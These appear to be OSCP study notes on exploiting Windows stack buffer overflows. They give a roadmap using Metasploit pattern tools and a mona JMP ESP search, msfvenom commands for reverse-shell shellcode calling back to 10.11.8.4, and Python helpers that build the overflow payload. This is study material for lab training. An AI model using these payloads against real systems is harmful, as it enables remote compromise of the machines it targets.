OSCP-notes

Let's try harder...


Buffer Overflow

EAX  - Extended Accumulator  - 32 bits
AX   - Accumulator           - 16 bits (low half of EAX)
AL   - Accumulator low       - 8 bits (low byte of AX)
EAX (accumulator): Arithmetical and logical instructions
EBX (base): Base pointer for memory addresses
ECX (counter): Loop, shift, and rotation counter
EDX (data): I/O port addressing, multiplication, and division
ESI (source index): Pointer addressing source in string copy operations
EDI (destination index): Pointer addressing destination in string copy operations
ESP - The Stack Pointer (top of the stack, i.e. the lowest address in use; grows toward lower addresses)
EBP - The Base Pointer (base of the current stack frame; locals are below it, saved EBP/return address above it)
EIP - The Instruction Pointer (address of the next instruction; overwriting the saved return address redirects it)

Buffer overflow protections in place

Roadmap to exploitation (stack-based only)

// 1. Crash with a unique pattern, then turn the EIP value shown in the debugger into the offset
msf-pattern_create -l 888
msf-pattern_offset -l 888 -q <EIP-hex-value>

// 2. Find bad characters (send \x01..\xff, compare with the stack dump, drop the first mangled byte, repeat)

// 3. Find a JMP ESP (FF E4) in a module without ASLR/Rebase/SafeSEH; the address itself must contain no bad chars
!mona find -s "\xff\xe4" -m "libspp.dll"

// 4. Generate shellcode, encoding around the bad characters found in step 2 (\x00 is always excluded)
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.8.4 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"

// For multi-threaded applications, use EXITFUNC=thread so the shellcode exits only its thread instead of the whole process and the target does not crash

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.8.4 LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"
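The helpers below tie the roadmap together in Python: a re-implementation of msf-pattern_create / msf-pattern_offset (including the little-endian reversal of the EIP value the debugger shows), a bad-character string generator and comparer, a check that a JMP ESP address contains no bad characters, and the final payload layout. This is an added example written for these notes, not code from the original page or from Metasploit. The EIP value 42306142, the stack dump, the bad-character list and the JMP ESP address 0x10091234 are constructed inputs for the demonstration; use the values your own debugger and mona report.

```python
"""Stack-overflow helpers for the roadmap above (added example, not the original notes)."""
import string
import struct
from typing import Optional

# Same alphabet and ordering as msf-pattern_create: 'Aa0Aa1...Aa9Ab0...' (20280 unique bytes).
_UPPER, _LOWER, _DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits


def pattern_create(length: int) -> bytes:
    """Re-implementation of `msf-pattern_create -l <length>`."""
    out = bytearray()
    for up in _UPPER:
        for lo in _LOWER:
            for dg in _DIGITS:
                out += (up + lo + dg).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("length exceeds the 20280-byte unique pattern")


def pattern_offset(pattern: bytes, eip_hex: str) -> int:
    """Re-implementation of `msf-pattern_offset -q <EIP>`.

    The debugger prints EIP as a big-endian number, but the four bytes that landed
    in it were read from the stack little-endian, so reverse them before searching.
    """
    needle = bytes.fromhex(eip_hex)[::-1]
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError(f"EIP value {eip_hex} not found in pattern")
    return idx


def badchar_string(exclude: bytes = b"\x00") -> bytes:
    """Every byte 0x01..0xff minus the ones already known bad.
    0x00 is left out from the start because it terminates C strings."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def first_badchar(sent: bytes, dumped: bytes) -> Optional[int]:
    """Compare the bytes sent with the bytes the debugger shows on the stack.

    Returns the FIRST byte that was altered or truncated. Only that one is
    trustworthy: later bytes are often collateral damage, so exclude it,
    regenerate the string and send again until sent == dumped.
    """
    for i, b in enumerate(sent):
        if i >= len(dumped) or dumped[i] != b:
            return b
    return None


def address_is_clean(addr: int, badchars: bytes) -> bool:
    """A JMP ESP address is unusable if any of its (little-endian) bytes is a bad character."""
    return not any(b in badchars for b in struct.pack("<I", addr))


def build_payload(offset: int, jmp_esp: int, shellcode: bytes,
                  nops: int = 16, total: Optional[int] = None) -> bytes:
    """filler | EIP overwrite (little-endian) | NOP sled | shellcode | padding.

    `total` keeps the buffer at the crash length already known to work.
    """
    buf = b"A" * offset + struct.pack("<I", jmp_esp) + b"\x90" * nops + shellcode
    if total is not None:
        if len(buf) > total:
            raise ValueError("payload does not fit in the original crash buffer")
        buf += b"C" * (total - len(buf))
    return buf


if __name__ == "__main__":
    # 1. crash with the pattern, 2. read EIP in the debugger, 3. compute the offset
    pattern = pattern_create(888)
    offset = pattern_offset(pattern, "42306142")   # constructed EIP value for the demo
    print("offset:", offset)

    # Constructed stack dump: the target treated 0x0a as end-of-line and dropped the rest
    sent = badchar_string(b"\x00")
    print("first bad char:", hex(first_badchar(sent, sent[:9])))

    # Hypothetical JMP ESP address and bad-character list; take yours from mona / step 2
    badchars = b"\x00\x0a\x0d\x25\x26\x2b\x3d"
    jmp_esp = 0x10091234
    print("address clean:", address_is_clean(jmp_esp, badchars))
    payload = build_payload(offset, jmp_esp, b"\xcc" * 4, total=888)  # \xcc = INT3 placeholder shellcode
    print(len(payload), payload[offset:offset + 4].hex())
```

Run the crash with `pattern_create(888)` instead of a run of A's, feed the EIP value straight from the debugger into `pattern_offset`, and keep `first_badchar` in the loop until it returns `None` before generating the msfvenom payload; swap the INT3 placeholder for the generated shellcode only once `address_is_clean` agrees with the final bad-character list.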